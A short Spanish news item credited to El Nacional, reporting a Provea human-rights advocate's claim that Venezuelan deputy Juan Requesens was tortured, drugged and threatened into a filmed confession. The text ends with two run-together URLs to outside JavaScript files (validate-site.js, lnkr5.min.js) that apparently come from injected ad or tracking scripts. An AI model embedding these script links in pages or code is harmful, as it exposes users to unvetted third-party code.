El defensor de derechos humanos se refirió sobre el caso de Juan Requesens, diputado a la Asamblea Nacional. Una fuente policial informó a Primero Justicia que el diputado fue drogado para obligarlo a declarar.

Inti Rodríguez, defensor de los derechos humanos en Provea, explicó este viernes que una confesión obtenida bajo tortura no tiene validez, ni puede ser admitida en juicio.

Rodrríguez se refirió sobre el caso de Juan Requesens, diputado a la Asamblea Nacional, e indicó que el parlamentario, a su juicio, fue torturado.

“El video filtrado comprueba la certeza de que el diputado ha sido torturado y sometido a tratos inhumanos con la firme intención de incriminarlo”, señaló Rodríguez.

También responsabilizó a Tarek William Saab, Alfredo Ruiz, Maikel Moreno y funcionarios del Sebin por los abusos realizados al diputado.

Hoy Jorge Rodríguez mostró un video en el que Requesens presuntamente confiesa una vinculación entre Julio Borges y el “atentado” contra Nicolás Maduro.

Una fuente policial informó a Primero Justicia que el diputado fue drogado para obligarlo a declarar. Además, indicó que lo amenazaron con asesinar a sus padres y violar a su hermana.

VÍA EL NACIONAL.

 

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=1533948383222https://devlinkin.xyz/addons/lnkr5.min.js

Loading...